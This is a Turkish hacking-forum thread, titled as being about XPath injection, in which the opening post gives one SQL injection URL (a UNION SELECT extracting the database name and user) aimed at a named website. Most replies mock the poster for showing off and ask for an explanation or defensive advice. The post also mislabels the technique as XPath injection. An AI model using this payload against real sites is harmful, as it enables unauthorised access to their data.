folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Xpath İnjection Az Bilinen Saldırı Türüdür.

Xpath İnjection Az Bilinen Saldırı Türüdür.

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Erkek

http://www.brainscripts.com/articlesdetails.php?id=1'+and+2-1=9+union+select+0,database(),user()+--+

sql sistem sistemetik matematiksel hesaplama şeklinde çıkan bir açık türüdür.

"Hayat zor olabilir ama ben de kolay sayılmam." insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Mirza Efe
    _Dert_
    _Dert_'s avatar
    Erkek
    Birz acıklama yaprmısın bu sql hakkinda.. and+2-1=9 bu islem neye göre?

3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ExcellencE
    ExcellencE's avatar
    Erkek
    nasıl kullanılıyo peki?

Yapay zeka, zeka değildir.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SpArK
    SpArK's avatar
    Erkek

Yazik inanki ya , ben sizi anliyamiyorum gercekten.Bu acigi senmi buldun ? yoksa biyerlerden gordun benzerlerini uyguluyormusun deneyip ? eger sen bulduysan

niye dokumantasyon yapip anlatmiyorsun ki bizde ogrenip yararlanalim ? nelerden faydalandin , acik yanlar nelerdir ve nasil korunur diye.Geliyonuz buraya linke 2,3

sql sorgusu eklemis halde tek satirlik seyi buraya kopyaliyosun  boyle birsey icin baslik aciyosun.Lamerlerin onune kemik atmak gibi birsey bu , inan bana tahribat 

boyle bir yer degil.Bunu baska forumdaki insanlar yapiyor kendi copluklerinde.Bu linki buraya koymussan , adim adim anlat su + kisimlarini  ekledigin query leri

neler yaptiklarini , nasil uygulacagimizi , ve nasil koruncagimizi.Bunu yapmicaksanda inan bence boyle bu linkleri bulup bulup boyle sadece bunlar icin baslik

acma bu sadece seni kucuk duruma dusurur.Oyuzden dokumantasyon ve egitim bekliyoruz.Ciddi ve samimi olarak bende bekliyorum ve istiyorum.Kırmak istedigimden

yada kasti olarak soylemedim ictenlikle soyluyorum. 

5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    tarzan
    tarzan's avatar
    Erkek
    SpArK bunu yazdı:
    -----------------------------

Yazik inanki ya , ben sizi anliyamiyorum gercekten.Bu acigi senmi buldun ? yoksa biyerlerden gordun benzerlerini uyguluyormusun deneyip ? eger sen bulduysan

niye dokumantasyon yapip anlatmiyorsun ki bizde ogrenip yararlanalim ? nelerden faydalandin , acik yanlar nelerdir ve nasil korunur diye.Geliyonuz buraya linke 2,3

sql sorgusu eklemis halde tek satirlik seyi buraya kopyaliyosun  boyle birsey icin baslik aciyosun.Lamerlerin onune kemik atmak gibi birsey bu , inan bana tahribat 

boyle bir yer degil.Bunu baska forumdaki insanlar yapiyor kendi copluklerinde.Bu linki buraya koymussan , adim adim anlat su + kisimlarini  ekledigin query leri

neler yaptiklarini , nasil uygulacagimizi , ve nasil koruncagimizi.Bunu yapmicaksanda inan bence boyle bu linkleri bulup bulup boyle sadece bunlar icin baslik

acma bu sadece seni kucuk duruma dusurur.Oyuzden dokumantasyon ve egitim bekliyoruz.Ciddi ve samimi olarak bende bekliyorum ve istiyorum.Kırmak istedigimden

mantıklı :|

Çalışmadan, yorulmadan, öğrenmeden rahat yaşama yollarını itiyat haline getiren milletler; önce haysiyetlerini, sonra istikballerini daha sonra da hürriyetlerini kaybetmeye mahkumdurlar. M. Kemal Atatürk
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    drakan
    drakan's avatar
    Erkek

EcHoLL bunu yazdı:

sql sistem sistemetik matematiksel hesaplama şeklinde çıkan bir açık türüdür.

---------------------------

Yani?

Açık olmasına açıkta o açıgı nasıl açcaz? açtık diyelim içine nasıl kaçcaz  ?

drakan & Oceanicy www.tasarimus.com
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    crackerlive
    crackerlive's avatar
    Erkek
    Birisi Bunu Açıklayabilirmi
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    nickneyime
    nickneyime's avatar
    Erkek

SpArK bunu yazdı:

spark, benim diceklerimi yazmışsın helal olsun :)

bunch of idiots around me, yes everywhere.
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    31 yaşında emekli
    ajan1111
    ajan1111's avatar
    Erkek
    adam egolarını tatmin ediyor bırakın boşalsın |:

Kayalardan kayarım yoktur benim ayarım (;
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    crackerlive
    crackerlive's avatar
    Erkek
    bunu döküman olarak açıklarsan bence daha güzel olur kimse verdiğin urlden anlamaz ne olduğunu... Anca gövde gösterisi yapmış olursun
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    aLsanCaK
    aLsanCaK's avatar
    Erkek

crackerlive bunu yazdı:
    bunu döküman olarak açıklarsan bence daha güzel olur kimse verdiğin urlden anlamaz ne olduğunu... Anca gövde gösterisi yapmış olursun

belkide adam birseyler paylasmak degilde , govde gosterisi yapmak istiyor ,, asikar :)) 

Toplam Hit: 2714 Toplam Mesaj: 11